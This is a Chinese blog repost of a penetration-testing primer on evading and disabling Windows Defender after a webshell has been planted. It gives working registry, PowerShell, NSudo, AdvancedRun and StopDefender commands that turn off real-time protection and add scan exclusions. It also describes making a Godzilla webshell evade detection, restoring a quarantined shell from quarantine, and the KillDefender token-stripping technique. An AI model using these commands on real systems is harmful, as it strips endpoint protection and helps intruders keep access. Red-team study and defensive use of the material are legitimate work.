Windows Defender渗透扫盲

最新推荐文章于 2024-05-31 12:55:01 发布
最新推荐文章于 2024-05-31 12:55:01 发布
阅读量1k 收藏 2
点赞数 1
文章标签: windows microsoft 渗透测试 网络安全
原文链接:https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender
版权

Windows defender 介绍

Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。 Microsoft Defender 防病毒软件是 Microsoft Defender for Endpoint 中下一代保护的主要组件。这种保护将机器学习、大数据分析、深入的威胁防御研究和 Microsoft 云基础设施结合在一起,以保护您组织中的设备(或端点)。Microsoft Defender 防病毒软件内置于 Windows 中,它与 Microsoft Defender for Endpoint 配合使用,为你的设备和云提供保护。

Windows defender 环境

版本

面板查看:依次选择Windows Security->Settings->AboutAntimalware Client Verions为Windows Defender版本

命令行查看:

dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b

查看已存在的查杀排除列表

1.通过面板查看

依次选择Windows Security->Virus & theat protection settings->Add or remove exclusions

2.通过命令行查看

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s

3.通过Powershell查看

Get-MpPreference | select ExclusionPath

Windows Server 系统环境

  • 用户:Administrator

  • 版本:Windows Server 2019

补丁

systeminfo 信息

事前准备

在实战环境中,首先需要上传webshell,所以在此必须免杀webshell

web环境:phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4

哥斯拉 webshell 免杀

工具地址:GitHub - BeichenDream/Godzilla: 哥斯拉 经过测试,用Godzilla自带的PHP_XOR_BASE64加密器即可免杀(php一句话直接杀)

生成 PHP_XOR_BASE64 webshell

静态免杀测试

连接webshell

动态免杀测试

关闭 Windows defender

TrustedInstaller

TrustedInstaller是从Windows Vista开始出现的一个内置安全主体,在Windows中拥有修改系统文件权限,本身是一个服务,以一个账户组的形式出现。 它的全名是:NT SERVICE\TrustedInstaller

那么为什么要获取TrustedInstaller权限?

说白了就是因为Administratior权限system权限cmd无法关闭Windows defender(powershell可以)

怎样获取TrustedInstaller权限

可参考文章《渗透技巧——Token窃取与利用》

也可以借助下面的几个工具实现

注意:以下工具技巧皆需要Administratior权限或者system权限才能成功使用

Tamper Protection

篡改保护

参考资料: Protect security settings with tamper protection | Microsoft Learn

当开启Tamper Protection时,用户将无法通过注册表、Powershell和组策略修改Windows Defender的配置

开启Tamper Protection的方法:

依次选择Windows Security->Virus & theat protection settings,启用Tamper Protection

该操作对应的cmd命令:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 5 /t REG_DWORD /f

关闭Tamper Protection的方法:

依次选择Windows Security->Virus & theat protection settings,禁用Tamper Protection

该操作对应的cmd命令:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 4 /t REG_DWORD /f,当然,我们无法通过修改注册表的方式去设置Tamper Protection,只能通过面板进行修改

查看Tamper Protection的状态:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"

返回结果中的数值5代表开启,数值4代表关闭

基础命令介绍

cmd

#查看排除项
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
#查看版本
dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b
#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"
​
​
#需要TrustedInstaller权限
##cmd注册表关闭Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
​
##cmd关闭篡改保护
NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 4 /t REG_DWORD /f"
​
##cmd注册表恢复Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f
​
##cmd添加Windows defender排除项
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG_DWORD /f

powershell

#查看排除项
Get-MpPreference | select ExclusionPath
​
#关闭Windows defender
Set-MpPreference -DisableRealTimeMonitoring $true
​
#增加排除项
Add-MpPreference -ExclusionPath "c:\temp"
​
#删除排除项
Remove-MpPreference -ExclusionPath "C:\test"
​
#关闭实时保护
Set-MpPreference -DisableRealtimeMonitoring $true
注:新版本的Windows已经不再适用

NSudoLG

工具地址:GitHub - M2TeamArchived/NSudo: [Deprecated, work in progress alternative: https://github.com/M2Team/NanaRun] Series of System Administration Tools 下载后使用:D:\Documents\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe

免杀测试

使用方法

注意:此工具的 -U:T 参数是获取了 TrustedInstaller 权限

#cmd注册表关闭Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
#cmd注册表恢复Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f
#cmd添加Windows defender排除项
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG_DWORD /f
​
#NSudoLG.exe关闭Windows defender
NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f"
#NSudoLG.exe恢复Windows defender
NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f"
#NSudoLG.exe添加Windows defender排除项
NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG_DWORD /f"

powershell成功上线

AdvancedRun

地址:AdvancedRun - Run a Windows program with different settings

免杀测试

使用方法

AdvancedRun.exe /EXEFilename "%windir%\system32\cmd.exe" /CommandLine '/c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f' /RunAs 8 /Run

powershell成功上线

StopDefender

Github地址:GitHub - lab52io/StopDefender: Stop Windows Defender programmatically

免杀测试

使用方法

StopDefender_x64.exe

powershell成功上线

powershell

注:新版本的Windows已经不再适用

#查看排除项
Get-MpPreference | select ExclusionPath

#关闭Windows defender
Set-MpPreference -DisableRealTimeMonitoring $true


#增加排除项
Add-MpPreference -ExclusionPath "c:\temp"

#删除排除项
Remove-MpPreference -ExclusionPath "C:\test"

关闭 Windows defender

关闭 实时保护

Set-MpPreference -DisableRealtimeMonitoring $true

其他技巧

添加查杀排除列表

1.通过面板添加

依次选择Windows Security->Virus & theat protection settings->Add or remove exclusions,选择Add an exclusion,指定类型

该操作等价于修改注册表HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\的键值,具体位置如下:

  • 类型File对应注册表项Paths

  • 类型Folder对应注册表项Paths

  • 类型File type对应注册表项Extensions

  • 类型Process对应注册表项Processes

2.通过命令行添加

利用条件:

  • 需要TrustedInstaller权限

cmd命令示例:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\test" /d 0 /t REG_DWORD /f

3.通过Powershell添加

利用条件:

  • 需要管理员权限

参考资料:

Add-MpPreference (Defender) | Microsoft Learn

Powershell命令示例:

Add-MpPreference -ExclusionPath "C:\test"

补充:删除排除列表

Remove-MpPreference -ExclusionPath "C:\test"

MpCmdRun恢复被隔离的文件

MpCmdRun介绍

配置和管理 Microsoft Defender 防病毒软件的命令行工具

详情

Use the command line to manage Microsoft Defender Antivirus | Microsoft Learn

寻找MpCmdRun位置

MpCmdRun的位置为: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>

#查看版本(查看<antimalware platform version>)
dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b

#验证
dir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0\" | findstr MpCmdRun

基础命令

#查看被隔离的文件列表
MpCmdRun -Restore -ListAll

#恢复指定名称的文件至原目录
MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php

#恢复所有文件至原目录
MpCmdRun -Restore -All

#查看指定路径是否位于排除列表中
MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\

移除Token导致Windows Defender失效

学习地址:

https://elastic.github.io/security-research/whitepapers/2022/02/02.sandboxing-antimalware-products-for-fun-and-profit/article/

简单理解:

  • Windows Defender进程为MsMpEng.exe

  • MsMpEng.exe是一个受保护的进程(Protected Process Light,简写为PPL)

  • 非PPL进程无法获取PPL进程的句柄,导致我们无法直接结束PPL进程MsMpEng.exe

  • 但是我们能够以SYSTEM权限运行的线程修改进程MsMpEng.exe的token

  • 当我们移除进程MsMpEng.exe的所有token后,进程MsMpEng.exe无法访问其他进程的资源,也就无法检测其他进程是否有害,最终导致Windows Defender失效

POC地址:GitHub - pwn1sher/KillDefender: A small POC to make defender useless by removing its token privileges and lowering the token integrity

利用条件:

  • 需要System权限

测试如下图

 

工具地址

GitHub - pwn1sher/KillDefender: A small POC to make defender useless by removing its token privileges and lowering the token integrity GitHub - Octoberfest7/KillDefender: A small (Edited) POC to make defender useless by removing its token privileges and lowering the token integrity GitHub - Octoberfest7/KDStab: BOF combination of KillDefender and Backstab

原文地址:

https://xz.aliyun.com/t/12280

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender

st3pby
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永久禁用Windows Defender代码方案(可恢复)【支持Windows10、Windows11】
夜栩的博客
06-07 2228
选择【疑难解答】-【高级选项】-【启动设置】-【重启】,然后按4键进入安全模式。选择【疑难解答】-【高级选项】-【启动设置】-【重启】,然后按4键进入安全模式。(输入非YES的其它任意字符回车是恢复Windows Defender)以管理员身份打开PowerShell,复制代码回车后,输入YES回车。以管理员身份打开PowerShell,复制代码回车后,输入NO回车。cmd运行命令:shutdown -f -r -o -t 0。cmd运行命令:shutdown -f -r -o -t 0。
使用Windowsdefender自定义扫描工具(以win10系统为例)
zhizhi120的博客
01-25 813
go使用wind10的Windowsdefender自定义扫描工具对文件进行检测
彻底关闭解决Windows Defender实时防护(MsMpEng.exe、Antimalware Service Executable) 占用CPU和内存过多 win11等多版本均有效
最新发布
探索发现,乐于分享~
05-31 1万+
彻底解决Windows defender高占用问题。电脑每次开机和平时使用过程中查看任务管理器时,都会发现此进程对cpu和内存的占用,甚至能到30%以上,电脑上已有其他安全软件,系统自带的此软件非必须。 电脑若没有组策略功能,可以直接使用根治方法的方式解决。
MpCmdRun恶意文件下载
Fly_鹏程万里
09-29 2646
文章前言 Windows DefenderWindows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~ 具体实现
Windows Defender 排除指定 文件夹、文件夹以提升性能】
努力学习
03-17 656
使用webStorm时候提醒排出程序和目录提升性能, 于是我就把我的代码目录和常用程序全部排出, 不过不知道能不能提升多少性能, 先加上再说。
彻底关闭Windows Defender&Windows 更新
热爱学习,喜欢折腾!
09-29 1908
Windows Defender ,现名 Microsoft Defender,曾用名 Microsoft Anti Spyware ,是一个杀毒程序,可以运行在 Windows XP 和 Windows Server 2003 操作系统上,并已内置在 系统中。 Windows Update ,一般指 Windows 更新 。是大多数 Windows 操作系统都带有的一种自动更新工具,一般用来为漏洞、驱动和软件提供升级和更新。
Windows Defender关闭工具
11-05
Windows DefenderMicrosoftWindows操作系统内置的一款安全防护软件,它提供了实时病毒、恶意软件和其他威胁的保护。然而,有时用户可能需要暂时或永久关闭Windows Defender,例如在安装其他防病毒软件或者进行...
关闭Windows Defender Service工具
05-05
Windows Defender是微软为Windows操作系统内置的一款安全防护软件,主要用于防止病毒、间谍软件和其他恶意软件的侵害。它包括实时保护、扫描、防火墙以及账户保护等功能。然而,在某些情况下,用户可能需要暂时或...
win10自带杀毒软件windows defender卸载工具
05-03
此方法适用于各种版本的windows10(专业版、企业版、教育版、ltsc2019、ltsb、1709、1803、1809及之后的版本)。此操作不可逆,请确认你不再需要Windows Defender功能。
一键开启关闭Windows Defender
09-09
Windows Defender是微软在Windows 10操作系统中内置的一款安全防护软件,主要功能是提供反病毒、反间谍软件以及防火墙等保护措施。它能够实时监控系统中的活动,防止恶意软件对用户数据和系统的破坏。然而,对于某些...
卸载WindowsDefender工具
06-07
Windows操作系统中,Windows Defender是默认的防病毒和安全防护软件。它提供了实时保护,防止恶意软件、病毒和其他潜在的不安全威胁。然而,在某些情况下,用户可能需要卸载Windows Defender,例如安装了第三方防...
解除任务管理器禁用.bat
06-17
解除任务管理器禁用,由于特殊原因,导致任务管理兰被禁用。
关闭msmpeng_你知道吗?把电脑系统里的这些进程关闭掉,可以提升系统流畅
weixin_39644325的博客
12-18 8093
在使用电脑的时候,很多用户都有感觉到,电脑刚开启使用的时候,win系统运行还是很流畅的。运行了一段时间后,就会感觉win系统慢慢的卡顿起来。主要原因是因为,我们在使用电脑的时候会运行很多软件,在关闭这些软件的时候,部分软件不会彻底关闭,还是会有些残留的进程在电脑系统后台运行占用CPU和内存。我们可以在任务管理器手动关闭掉这些进程。调起电脑系统任务管理器方法很简单,在桌面任务栏处单击鼠标右键,选择“...
关闭 Windows Defender
pureman_mega的博客
01-29 376
通过api关闭windows defender 服务
Powershell从防御者列表中排除文件夹的方法
cullen2012的博客
09-10 633
Manly, now you can stop reading, go to the PowerShell and update excludes:) 男子气概,现在您可以停止阅读,转到PowerShell并更新排除项:) But if you are want to see how to perform this in more detail — welcome under the ha...
Windows Defender开机自动更新升级病毒库
子曰小玖的博客
09-16 2005
VoltPillager: Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface Abstract Hardware-based fault injection attacks such as voltage and clock glitching have been thoroughly studied on embedded devices.
关闭msmpeng_关闭Windows Defender与性能提升测试
weixin_42156940的博客
01-14 7053
如果在跑程序时观察过任务管理器,有时会发现占用cpu最高的除了自己运行的程序,还有一个进程叫“Antimalware Service Executable”,程序名为MsMpEng.exe。顾名思义,这是防病毒程序。这个程序是在有文件写入硬盘时进行的实时扫描保护程序。虽然看起来cpu占用率极高,但其实并没有占那么多,具体原因还没调查过,不过使用process explorer(https://do...
windows下关闭指定端口服务
mmc2015的专栏
03-20 1万+
有时候你想用一个端口,但是发现被其他服务占用了,所以必须关闭该端口,然后启动你想要的服务,令后者使用该端口。 出现了几次这个问题,记录一下好了,要不每次都要查(关键还是懒得记这些命令): C:\Users\mmc> tasklist|findstr "80" wininit.exe                    580 Services                  
如何彻底关闭:Windows Defender Service
hvac_011的博客
01-27 6952
       最近看一些加密视频,老是跳出来MsMpEng.exe在运行,本来看个视频被加密就恼火还跳出来这个那个的,网上找了一个下解决方法,测试一下可以。拿出来大家分享   其实很简单:只要能够引导系统进入pe系统(u盘)或者任何其他的系统(双系统的win7、win8、xp,甚至linux)进入电脑,删除或改名windows defender的两个服务的可执行文件即可! 该方法绿色、且彻底...
Windows Defender
07-28
如果Windows Defender打不开,您可以尝试以下步骤: 1. 检查Windows Defender是否已被禁用。在Windows搜索栏中输入“Windows安全中心”,然后打开该应用程序。在“病毒和威胁防护”下,确保Windows Defender处于“开启”状态。 2. 确保您的Windows Defender已更新到最新版本。在Windows搜索栏中输入“Windows安全中心”,然后打开该应用程序。在“病毒和威胁防护”下,单击“病毒和威胁防护设置”,然后单击“更新和安全性”。 3. 检查您的计算机是否感染了病毒或恶意软件。运行杀毒软件或反恶意软件程序,以确保您的计算机安全。 如果以上步骤无法解决问题,请尝试重新安装Windows Defender或联系技术支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值